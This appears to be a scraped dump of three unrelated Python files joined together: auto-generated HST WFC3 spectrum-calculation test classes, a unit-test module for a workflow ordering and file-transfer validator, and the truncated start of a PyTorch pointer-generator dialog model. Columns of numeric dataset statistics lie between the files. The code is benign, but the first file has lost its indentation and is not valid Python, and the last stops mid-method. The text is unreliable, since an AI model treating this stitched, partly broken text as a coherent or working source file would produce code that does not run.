self.etcid="None"
self.setglobal(__file__)
self.runpy()
class calcspecCase129(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,18700,0.0,3.9)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase7(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,18700,0.0,3.9)*ebmvx(0.12,gal3),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5128"
self.setglobal(__file__)
self.runpy()
class calcspecCase130(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,15400,0.0,3.9)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase8(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,15400,0.0,3.9)*ebmvx(0.16,smc),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5129"
self.setglobal(__file__)
self.runpy()
class calcspecCase131(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="icat(k93models,11900,0.0,4.0)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase9(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,11900,0.0,4.0)*ebmvx(0.2,lmc),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5130"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase10(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(icat(k93models,9230,0.0,4.1)*ebmvx(0.24,xgal),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5131"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase11(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_1.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.04,gal1)"
self.subset=True
self.etcid="uvsp1006.tab:5132"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase12(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_1.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.08,gal1)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase13(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_2.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.12,gal3)"
self.subset=True
self.etcid="uvsp1006.tab:5134"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase14(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_2.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.16,smc)"
self.subset=False
self.etcid="uvsp1006.tab:5135"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase15(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_3.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.2,lmc)"
self.subset=True
self.etcid="uvsp1006.tab:5136"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase16(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_4.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.24,xgal)"
self.subset=False
self.etcid="uvsp1006.tab:5137"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase17(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_5.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.04,gal1)"
self.subset=True
self.etcid="uvsp1006.tab:5138"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase18(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_5.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.08,gal1)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase19(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_6.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.12,gal3)"
self.subset=False
self.etcid="uvsp1006.tab:5140"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase20(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_10.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.16,smc)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase21(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_11.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.2,lmc)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase22(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_12.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.24,xgal)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase23(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_9.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.04,gal1)"
self.subset=False
self.etcid="uvsp1006.tab:5144"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase24(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(spec(/grp/hst/cdbs//grid/pickles/dat_uvk/pickles_uk_14.fits),band(cousins,i),23.0,vegamag)*ebmvx(0.08,gal1)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase25(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(z(spec(/grp/hst/cdbs//calspec/g191b2b_mod_004.fits),0.05),band(johnson,b),23.0,vegamag)"
self.subset=True
self.etcid="uvsp1006.tab:5146"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase26(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(z(spec(/grp/hst/cdbs//calspec/gd153_mod_004.fits),0.1),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5147"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase27(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(z(spec(/grp/hst/cdbs//calspec/gd71_mod_005.fits),0.15),band(johnson,b),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5148"
self.setglobal(__file__)
self.runpy()
class calcspecCase133(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="bb(10000)"
self.subset=True
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase28(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,u),23.0,vegamag)"
self.subset=True
self.etcid="uvsp1006.tab:5149"
self.setglobal(__file__)
self.runpy()
class countrateCase3(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.1,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5150"
self.setglobal(__file__)
self.runpy()
class calcphotCase3(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.1,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5150"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase29(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,r),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5150"
self.setglobal(__file__)
self.runpy()
class countrateCase4(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),23.3,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5151"
self.setglobal(__file__)
self.runpy()
class calcphotCase4(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),23.3,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5151"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase30(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,i),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5151"
self.setglobal(__file__)
self.runpy()
class countrateCase5(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),21.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5152"
self.setglobal(__file__)
self.runpy()
class calcphotCase5(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),21.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5152"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase31(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,j),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5152"
self.setglobal(__file__)
self.runpy()
class countrateCase6(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.424602593467696,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5153"
self.setglobal(__file__)
self.runpy()
class calcphotCase6(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+rn(spec(Zodi.fits),band(johnson,v),22.424602593467696,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5153"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase32(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(johnson,k),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5153"
self.setglobal(__file__)
self.runpy()
class countrateCase7(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+spec(Zodi.fits)*0.5+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5154"
self.setglobal(__file__)
self.runpy()
class calcphotCase7(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*0.5+spec(Zodi.fits)*0.5+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5154"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase33(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(bb(10000),band(cousins,r),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5154"
self.setglobal(__file__)
self.runpy()
class calcspecCase139(basecase.calcspecCase):
def setUp(self):
self.obsmode="None"
self.spectrum="pl(4000.0,-2.0,flam)"
self.subset=False
self.etcid="None"
self.setglobal(__file__)
self.runpy()
class countrateCase8(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*2.0+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5155"
self.setglobal(__file__)
self.runpy()
class calcphotCase8(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)*2.0+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5155"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase34(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(pl(4000.0,-2.0,flam),band(bessell,h),23.0,vegamag)"
self.subset=True
self.etcid="uvsp1006.tab:5155"
self.setglobal(__file__)
self.runpy()
class countrateCase9(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5156"
self.setglobal(__file__)
self.runpy()
class calcphotCase9(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="spec(earthshine.fits)+rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5156"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase35(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(pl(4000.0,-2.0,flam),band(Bessell,j),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5156"
self.setglobal(__file__)
self.runpy()
class countrateCase10(basecase.countrateCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5157"
self.setglobal(__file__)
self.runpy()
class calcphotCase10(basecase.calcphotCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280,bkg"
self.spectrum="rn(spec(Zodi.fits),band(johnson,v),22.7,vegamag)+(spec(el1215a.fits)+spec(el1302a.fits)+spec(el1356a.fits)+spec(el2471a.fits))"
self.subset=False
self.etcid="uvsp1006.tab:5157"
self.setglobal(__file__)
self.runpy()
class SpecSourcerateSpecCase36(basecase.SpecSourcerateSpecCase):
def setUp(self):
self.obsmode="wfc3,uvis1,g280"
self.spectrum="rn(pl(4000.0,-2.0,flam),band(bessell,k),23.0,vegamag)"
self.subset=False
self.etcid="uvsp1006.tab:5157"
self.setglobal(__file__)
self.runpy()
# Script entry point: run a single case interactively when 'debug' is passed
# on the command line, otherwise run every test case in this module.
if __name__ == '__main__':
    if 'debug' in sys.argv:
        testutil.debug(__name__)
    else:
        # NOTE(review): the trailing 2 looks like a verbosity/level argument --
        # confirm against pytools.testutil.testall.
        testutil.testall(__name__,2)
    # Apparent generation tally per case type: total - unique = duplicates.
    #calcspec:141 - 133 dup =8
    #thermback:0 - 0 dup =0
    #calcphot:10 - 1 dup =9
    #countrate:10 - 1 dup =9
    #SpecSourcerateSpec:36 - 1 dup =35
| 60.506931
| 3,171
| 0.683466
| 4,065
| 30,556
| 5.061747
| 0.086101
| 0.24966
| 0.035575
| 0.047434
| 0.922677
| 0.919032
| 0.888316
| 0.878694
| 0.87811
| 0.872764
| 0
| 0.188913
| 0.139874
| 30,556
| 504
| 3,172
| 60.626984
| 0.593981
| 0.004091
| 0
| 0.733871
| 0
| 0.104839
| 0.536219
| 0.189838
| 0
| 0
| 0
| 0
| 0
| 1
| 0.122984
| false
| 0
| 0.006048
| 0
| 0.252016
| 0
| 0
| 0
| 0
| null | 1
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
eeff1f2641f9291e1c4a5055ecf8ab4773f633e7
| 9,258
|
py
|
Python
|
scripts/validation/order_validator_test.py
|
malawski/cloudworkflowsimulator
|
12b2f30c7f72c3e52a5c53d86fd39b319adf71c8
|
[
"Apache-2.0"
] | 22
|
2015-05-28T10:08:46.000Z
|
2021-11-01T12:47:16.000Z
|
scripts/validation/order_validator_test.py
|
AYUSHMIT/cloudworkflowsimulator
|
12b2f30c7f72c3e52a5c53d86fd39b319adf71c8
|
[
"Apache-2.0"
] | 46
|
2015-01-14T18:23:11.000Z
|
2017-07-18T02:26:48.000Z
|
scripts/validation/order_validator_test.py
|
AYUSHMIT/cloudworkflowsimulator
|
12b2f30c7f72c3e52a5c53d86fd39b319adf71c8
|
[
"Apache-2.0"
] | 18
|
2015-02-11T17:48:20.000Z
|
2021-11-01T12:47:17.000Z
|
import unittest
from log_parser.execution_log import TransferLog
from validation import workflow, order_validator
from validation.parsed_log_loader import TaskLog
class OrderValidatorTest(unittest.TestCase):
    """Unit tests for order_validator.

    Covers two validators:
      * validate() -- no task may start before all of its DAG
        predecessors have finished.
      * validate_transfers() -- every file crossing a DAG edge must be
        uploaded from, and downloaded to, the correct VM with the
        correct transfer direction.
    """

    #          /-> child1
    #   parent |
    #          \-> child2
    def _prepare_parent_child_dag(self):
        """Build a three-task DAG where 'parent' precedes both children."""
        parent_task = workflow.Task('parent', 10.0)
        child1_task = workflow.Task('child1', 2.0)
        child2_task = workflow.Task('child2', 3.0)
        dag_builder = workflow.DagBuilder()
        dag_builder.add_task(parent_task)
        dag_builder.add_task(child1_task)
        dag_builder.add_task(child2_task)
        dag_builder.add_edge('parent', 'child1')
        dag_builder.add_edge('parent', 'child2')
        return dag_builder.build()

    # before --> (transferred.txt) --> after
    def _prepare_file_transfer_dag(self):
        """Build a two-task DAG where 'before' hands a file to 'after'."""
        before_task = workflow.Task('before', 10.0)
        after_task = workflow.Task('after', 10.0)
        transferred_file = workflow.File('transferred.txt', 1000)
        dag_builder = workflow.DagBuilder()
        dag_builder.add_task(before_task)
        dag_builder.add_task(after_task)
        dag_builder.add_file(transferred_file)
        dag_builder.add_edge('before', 'after')
        dag_builder.add_output_file('before', 'transferred.txt')
        dag_builder.add_input_file('after', 'transferred.txt')
        return dag_builder.build()

    def _transfer_task_logs(self):
        """Task logs shared by every transfer test: 'before' runs on vm 1
        during [0, 10], 'after' runs on vm 1 during [13, 18]."""
        return [
            TaskLog(id='before_1', workflow='1', task_id='before', started=0.0, finished=10.0,
                    vm=1, result='OK'),
            TaskLog(id='after_1', workflow='1', task_id='after', started=13.0, finished=18.0,
                    vm=1, result='OK')]

    def test_should_pass_when_order_is_correct(self):
        dag = self._prepare_parent_child_dag()
        dag.id = '1'
        tasks = [
            TaskLog(id='parent_1', workflow='1', task_id='parent', started=0.0, finished=10.0,
                    vm=1, result='OK'),
            TaskLog(id='child1_1', workflow='1', task_id='child1', started=11.0, finished=13.0,
                    vm=1, result='OK'),
            TaskLog(id='child2_1', workflow='1', task_id='child2', started=12.0, finished=15.0,
                    vm=2, result='OK')]
        result = order_validator.validate(dag, tasks)
        self.assertTrue(result.is_valid)
        self.assertListEqual([], result.errors)

    def test_should_fail_if_any_following_task_was_finished_before(self):
        dag = self._prepare_parent_child_dag()
        dag.id = '1'
        # child2 runs entirely inside parent's execution window.
        tasks = [
            TaskLog(id='parent_1', workflow='1', task_id='parent', started=0.0, finished=10.0,
                    vm=1, result='OK'),
            TaskLog(id='child1_1', workflow='1', task_id='child1', started=11.0, finished=13.0,
                    vm=1, result='OK'),
            TaskLog(id='child2_1', workflow='1', task_id='child2', started=5.0, finished=8.0,
                    vm=2, result='OK')]
        result = order_validator.validate(dag, tasks)
        self.assertFalse(result.is_valid)
        self.assertIn('child2', result.errors[0])

    def test_should_pass_if_task_was_started_immediately(self):
        dag = self._prepare_parent_child_dag()
        dag.id = '1'
        # Children start exactly when the parent finishes (boundary case).
        tasks = [
            TaskLog(id='parent_1', workflow='1', task_id='parent', started=0.0, finished=10.0,
                    vm=1, result='OK'),
            TaskLog(id='child1_1', workflow='1', task_id='child1', started=10.0, finished=13.0,
                    vm=1, result='OK'),
            TaskLog(id='child2_1', workflow='1', task_id='child2', started=10.0, finished=15.0,
                    vm=2, result='OK')]
        result = order_validator.validate(dag, tasks)
        self.assertTrue(result.is_valid)

    def test_should_pass_if_transfers_are_ok(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        transfers = [
            TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
                        direction='UPLOAD', file_id='transferred.txt'),
            TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
                        direction='DOWNLOAD', file_id='transferred.txt')]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertTrue(result.is_valid)
        self.assertListEqual([], result.errors)

    def test_should_fail_if_file_was_not_downloaded_at_all(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        transfers = [
            TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
                        direction='UPLOAD', file_id='transferred.txt'),
            ]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertFalse(result.is_valid)

    def test_should_fail_if_file_was_not_uploaded_at_all(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        transfers = [
            TransferLog(
                id='234', job_id='after_1', vm=1, started=12.0,
                finished=13.0, direction='DOWNLOAD', file_id='transferred.txt')]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertFalse(result.is_valid)

    def test_should_fail_if_downloaded_to_bad_vm(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        # Upload claims vm 2, but 'before' ran on vm 1.
        transfers = [
            TransferLog(id='123', job_id='before_1', vm=2, started=10.0, finished=12.0,
                        direction='UPLOAD', file_id='transferred.txt'),
            TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
                        direction='DOWNLOAD', file_id='transferred.txt')]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertFalse(result.is_valid)

    def test_should_fail_if_uploaded_from_bad_vm(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        # Download claims vm 2, but 'after' ran on vm 1.
        transfers = [
            TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
                        direction='UPLOAD', file_id='transferred.txt'),
            TransferLog(id='234', job_id='after_1', vm=2, started=12.0, finished=13.0,
                        direction='DOWNLOAD', file_id='transferred.txt')]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertFalse(result.is_valid)

    def test_should_fail_if_upload_instead_of_download(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        transfers = [
            TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
                        direction='UPLOAD', file_id='transferred.txt'),
            TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
                        direction='UPLOAD', file_id='transferred.txt')]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertFalse(result.is_valid)

    def test_should_fail_if_download_instead_of_upload(self):
        dag = self._prepare_file_transfer_dag()
        dag.id = '1'
        tasks = self._transfer_task_logs()
        transfers = [
            TransferLog(id='123', job_id='before_1', vm=1, started=10.0, finished=12.0,
                        direction='DOWNLOAD', file_id='transferred.txt'),
            TransferLog(id='234', job_id='after_1', vm=1, started=12.0, finished=13.0,
                        direction='DOWNLOAD', file_id='transferred.txt')]
        result = order_validator.validate_transfers(dag, tasks, transfers)
        self.assertFalse(result.is_valid)
# Run the suite when this module is executed directly.
if __name__ == '__main__':
    unittest.main()
| 40.427948
| 95
| 0.603586
| 1,216
| 9,258
| 4.361842
| 0.080592
| 0.059389
| 0.043364
| 0.060709
| 0.815799
| 0.786011
| 0.78356
| 0.782051
| 0.761312
| 0.761312
| 0
| 0.054483
| 0.250594
| 9,258
| 228
| 96
| 40.605263
| 0.710003
| 0.008317
| 0
| 0.715116
| 0
| 0
| 0.099378
| 0
| 0
| 0
| 0
| 0
| 0.075581
| 1
| 0.069767
| false
| 0.017442
| 0.023256
| 0
| 0.110465
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
011698680b2c96d935d6bfd11067c645d3067ded
| 22,749
|
py
|
Python
|
zsdg/models/models.py
|
josephch405/NeuralDialog-ZSDG
|
0daa96e8f4d6786c1c8b96c27b1f6200605909a1
|
[
"Apache-2.0"
] | null | null | null |
zsdg/models/models.py
|
josephch405/NeuralDialog-ZSDG
|
0daa96e8f4d6786c1c8b96c27b1f6200605909a1
|
[
"Apache-2.0"
] | null | null | null |
zsdg/models/models.py
|
josephch405/NeuralDialog-ZSDG
|
0daa96e8f4d6786c1c8b96c27b1f6200605909a1
|
[
"Apache-2.0"
] | null | null | null |
# -*- coding: utf-8 -*-
# author: Tiancheng Zhao
import torch
import torch.nn as nn
import torch.nn.functional as F
from zsdg.dataset.corpora import PAD, BOS, EOS, BOD
from zsdg import criterions
from zsdg.enc2dec.decoders import DecoderRNN, DecoderPointerGen
from zsdg.enc2dec.encoders import EncoderRNN, RnnUttEncoder
from zsdg.utils import INT, FLOAT, LONG, cast_type
from zsdg.nn_lib import IdentityConnector, Bi2UniConnector
from zsdg import nn_lib
import numpy as np
from zsdg.enc2dec.decoders import GEN
from zsdg.utils import Pack
from zsdg.models.model_bases import BaseModel
class PtrBase(BaseModel):
    """Shared base for pointer-generator models.

    Provides the combined training loss: standard NLL over decoder
    outputs plus an auxiliary "attention" loss on the pointer softmax.
    """

    def compute_loss(self, dec_outs, dec_ctx, labels):
        """Return Pack(nll=..., attn_loss=...) for one decoded batch.

        attn_loss is None when the decoder produced no gating tensor
        (dec_ctx has no DecoderPointerGen.KEY_G entry).
        """
        rnn_loss = self.nll_loss(dec_outs, labels)
        # find attention loss
        g = dec_ctx.get(DecoderPointerGen.KEY_G)
        if g is not None:
            ptr_softmax = dec_ctx[DecoderPointerGen.KEY_PTR_SOFTMAX]
            flat_ptr = ptr_softmax.view(-1, self.vocab_size)
            # PAD positions are masked out of the loss below.
            label_mask = labels.view(-1, 1) == self.rev_vocab[PAD]
